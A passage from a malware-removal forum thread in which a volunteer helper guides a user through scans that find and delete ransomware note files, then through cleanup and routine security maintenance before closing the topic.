20:03:23.0559 0x0b14  [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk0\DR0
20:03:23.0653 0x0b14  \Device\Harddisk0\DR0 - ok
20:03:23.0653 0x0b14  ================ Scan VBR ==================================
20:03:23.0810 0x0b14  [ ECE07EFD2A07758212FE5D9E24B2C53F ] \Device\Harddisk0\DR0\Partition1
20:03:23.0920 0x0b14  \Device\Harddisk0\DR0\Partition1 - ok
20:03:23.0935 0x0b14  [ FCF02374247C4FF70FA948D7D729303D ] \Device\Harddisk0\DR0\Partition2
20:03:23.0967 0x0b14  \Device\Harddisk0\DR0\Partition2 - ok
20:03:23.0998 0x0b14  [ B1E27AA018409DE6BFD73F8AFB883A65 ] \Device\Harddisk0\DR0\Partition3
20:03:24.0014 0x0b14  \Device\Harddisk0\DR0\Partition3 - ok
20:03:24.0045 0x0b14  [ 9943BD10C11F11A95DE7165464A9FB9F ] \Device\Harddisk0\DR0\Partition4
20:03:24.0045 0x0b14  \Device\Harddisk0\DR0\Partition4 - ok
20:03:24.0092 0x0b14  [ 91F38923386AA19826BE833311AE66CE ] \Device\Harddisk0\DR0\Partition5
20:03:24.0139 0x0b14  \Device\Harddisk0\DR0\Partition5 - ok
20:03:24.0170 0x0b14  [ DD5B2873F540D73CC86B2AD1D16D9D4B ] \Device\Harddisk0\DR0\Partition6
20:03:24.0232 0x0b14  \Device\Harddisk0\DR0\Partition6 - ok
20:03:24.0232 0x0b14  ================ Scan generic autorun ======================
20:03:24.0889 0x0b14  [ AF04B6DDF123991C625472494BC1221C, D02BEC96FF466187130B5868DCB70E56CEE25101A8889A1AEF3CFE60ECBE6DC6 ] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
20:03:25.0295 0x0b14  RTHDVCPL - ok
20:03:25.0326 0x0b14  SynTPEnh - ok
20:03:25.0638 0x0b14  [ D6FF94ED4D086489A453134F0AE33FD3, 47E1CE640E9AB6B8DD148DACA80B1D07BCF69DF9F6B109285419447B9A4025FF ] C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe
20:03:25.0670 0x0b14  CLVirtualDrive - ok
20:03:25.0983 0x0b14  [ B7995C675014EEBE77A0BEB7AFCCFC08, 41D186C63273301CF0A1C1EE7B6EB0BB75A251DD441532C5CEB7A4095FB103CD ] C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
20:03:25.0998 0x0b14  RemoteControl10 - ok
20:03:26.0186 0x0b14  [ EBAE9EE13F51F38B57D616CF4A420682, E27969D5F0B796C2C8DA7C46680AB6C797A8F297B105477B71B4871F8F7B62FD ] C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
20:03:26.0217 0x0b14  HP Quick Launch - ok
20:03:26.0639 0x0b14  [ 73F1B07CF82235B25BCC3E9A7522ACCB, 47221B8DFF5A44050AFB0AB5A249FEECE36BE2E000D6529E099128EEDFA647DA ] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe
20:03:26.0670 0x0b14  StartCCC - ok
20:03:26.0920 0x0b14  [ 5120CD65A74A5E054FB2B0577688024C, 2C771743C797ED2F94E4C0CD7472D20532DB6C3E95DEB0DA4D14D6B5469EE273 ] C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
20:03:26.0920 0x0b14  Avira Systray - ok
20:03:27.0498 0x0b14  [ 28DEF0EFB36D172EAA5A08EB09CF75DF, 62D07A28167AEBFB9511830BFBBEAAB17CC24D57FF8D07F1414D921135BC9024 ] C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
20:03:27.0529 0x0b14  avgnt - ok
20:03:27.0847 0x0b14  AV detected via SS2: Avira Antivirus, C:\Program Files (x86)\Avira\Antivirus\wsctool.exe ( 15.0.12.402 ), 0x41000 ( enabled : updated )
20:03:27.0894 0x0b14  AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.7.205.0 ), 0x60100 ( disabled : updated )
20:03:27.0956 0x0b14  Win FW state via NFP2: enabled ( trusted )
20:03:27.0956 0x0b14  ============================================================
20:03:27.0956 0x0b14  Scan finished
20:03:27.0956 0x0b14  ============================================================
20:03:27.0972 0x09c8  Detected object count: 0
20:03:27.0972 0x09c8  Actual detected object count: 0
20:11:45.0195 0x1114  Deinitialize success
 


#6
Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts
You are to copy the code into Notepad (which you did correctly). Everything looks good on my end. How is your computer running now? :) The below step will take the most time as it is a comprehensive scan, but you should be good to go if we get good results.
  • Step 1

    Run a free 'ESET Online Scan by ESET' by firstly saving the file to your desktop.
    • Double-click esetsmartinstaller_enu.exe. Accept the Terms of Use then click on Start.
    • Ensure the following settings are followed before clicking Start (you may or may not see the software warning at the very bottom):

      [Image: nvMhqop.png]

    • The virus signature database will begin to download. Wait for the scan to end--it may take several hours.
    • Upon completion, select List of found threats > Export to text file....
    • Press Back and put a check on the following:
      • Uninstall application on close
      • Delete quarantined files
    • Click Finish.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
  • Step 2

    Download 'SecurityCheck by screen317' and save it to your desktop.
    • Simply double-click the program icon to run it. It will ask for administrator privileges.
    • A black window will appear. Press any key to continue.
    • Wait for it to finish. It won't take long.
    • A log will automatically pop up once done.
    • Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.
    Note: If you get an error about an unsupported operating system, please reboot your computer and try again.
  • Logs to Post

    In summary of the above, I will need you to post the following log(s):
    • checkup.txt (SecurityCheck)
    • log.txt (ESET Online Scan)


#7
smwifey

    Member

  • Topic Starter
  • 85 posts

Seems to be running better.  No pop-ups recently.  Scans found lots, though.  Also, is it possible/advisable to get rid of Windows Defender?  Thanks for all of your help.

 

C:\FRST\Quarantine\C\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Local\HELP_DECRYPT.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Local\HELP_DECRYPT.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Local\HELP_DECRYPT.URL.xBAD Win32/Filecoder.EA trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT.xBAD Win32/Filecoder.CR trojan deleted - quarantined
C:\FRST\Quarantine\C\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL.xBAD Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Public\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Public\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Public\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Public\CyberLink\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Public\CyberLink\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Public\CyberLink\HELP_DECRYPT.URL Win32/Filecoder.EA trojan deleted - quarantined
C:\Users\Richie\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\Richie\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan deleted - quarantined
 
 

 Results of screen317's Security Check version 1.006  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Avira Antivirus    
Windows Defender   
 Antivirus up to date!   
`````````Anti-malware/Other Utilities Check:````````` 
 Google Chrome (44.0.2403.107) 
 Google Chrome (44.0.2403.125) 
````````Process Check: objlist.exe by Laurent````````  
 Avira Antivir avgnt.exe 
 Avira Antivir avguard.exe 
 Avira Antivirus sched.exe  
 Avira Antivirus avshadow.exe  
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 
 


#8
Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts

Our work is done here then. :) Keeping Windows Defender is your call. Personally, I have it turned off since it cannot be uninstalled. Since you already have an anti-virus you can do the same. Below are the last few things you should do:

Thank you for your cooperation. Your logs show no sign of infection. Congratulations, your system is now clean. :thumbsup: Below are the last few steps for you to accomplish.

Remove Temporary Files with TFC by OldTimer

  • Download 'TFC by OldTimer' and save it to your desktop.
    • Ensure all programs and windows are closed before proceeding.
    • Simply double-click the program icon to run it. It will ask for administrator privileges.
    • Click the Start button and wait for the process to complete.
    • You will be prompted to reboot. Please allow it by choosing Yes.

Remove Special Tools with DelFix by Xplode

  • Download 'DelFix by Xplode' and save it to your desktop.
    • Simply double-click the program icon to run it. It will ask for administrator privileges.
    • Ensure the following options are checked:
      • Remove disinfection tools
      • Create registry backup
      • Purge system restore
      • Reset system settings
    • Press Run.
    • A log will automatically pop-up. Copy (CTRL + A and CTRL + C) and paste (CTRL + V) the content of the log in your next reply.


#9
smwifey

    Member

  • Topic Starter
  • 85 posts

Thanks so much for all your help.  Running SO much better.

 

# DelFix v1.010 - Logfile created 02/08/2015 at 09:04:09
# Updated 26/04/2015 by Xplode
# Username : Richie - RICHIE
# Operating System : Windows 8.1  (64 bits)
 
~ Removing disinfection tools ...
 
Deleted : C:\FRST
Deleted : C:\Users\Richie\Desktop\FRST-OlderVersion
Deleted : C:\TDSSKiller.3.1.0.5_30.07.2015_20.01.50_log.txt
Deleted : C:\Users\Richie\Desktop\Addition.txt
Deleted : C:\Users\Richie\Desktop\esetsmartinstaller_enu.exe
Deleted : C:\Users\Richie\Desktop\Fixlog.txt
Deleted : C:\Users\Richie\Desktop\FRST.txt
Deleted : C:\Users\Richie\Desktop\FRST64.exe
Deleted : C:\Users\Richie\Desktop\SecurityCheck.exe
Deleted : C:\Users\Richie\Desktop\tdsskiller.exe
Deleted : C:\Users\Richie\Desktop\TFC.exe
Deleted : C:\Users\Richie\Downloads\Addition.txt
Deleted : C:\Users\Richie\Downloads\FRST.txt
Deleted : C:\Users\Richie\Downloads\FRST64.exe
Deleted : HKLM\SOFTWARE\OldTimer Tools
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########


#10
Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts

I will now proceed to giving you tips on how to maintain your system as it is. Anytime you encounter an infection again, please do not hesitate to go back here at Geeks to Go. :)

Remove, Disable, or Update Java

As Java is the 'most exploited program at this time', I recommend that you remove it unless you need it. If so, it is prudent to 'disable it in your web browser(s)' while ensuring your copy is always up-to-date. Older versions are prone to exploits and vulnerabilities.
  • Download the latest 'Java' installation and save it to your desktop.
    • You need to uninstall any previous Java installations.
      • For Windows XP: Navigate to Start > Control Panel > Add or Remove Programs.
      • For Windows Vista: Navigate to Start > Control Panel > Programs and Features or Uninstall a Program.
      • For Windows 7: Navigate to Start > Control Panel > Programs and Features or Uninstall a Program.
      • For Windows 8: Navigate to Start > Start Context Menu > Programs and Features or Uninstall a Program.
    • Search the list for previous installations of Java such as all versions below:
      • Java™ 8 Update 51
    • Proceed to uninstalling the old versions and install the one you've just downloaded.

Update Your Anti-Virus Every Day

Updating


Ensuring that you have one anti-virus installed in your system is a good way to prevent being infected. You must always make sure to update your anti-virus every day; anti-virus companies see to it that the latest definition updates are distributed to be up to par with the propagation of malware. Your anti-virus is useless if you do not update it.


Scanning


Set a scanning routine. Ensure that you do a full scan with your anti-virus monthly. This is part of maintaining a clean system--a scanning routine proves to be effective. You can never be sure when your computer has caught an infection.


If you have any unresolved issues with regard to this thread or you need more :help: please ask me. I would assist you further, should it be required. Otherwise, enjoy your clean system.

:cheers:

Thank you.

#11
Pyxis

    Trusted Helper

  • Malware Removal
  • 1,228 posts

Since this issue appears to be resolved, this topic has been closed. Glad we could help. :)

If you're the topic starter, and need this topic reopened, please contact a staff member with the address of the thread.

Everyone else please begin a new topic.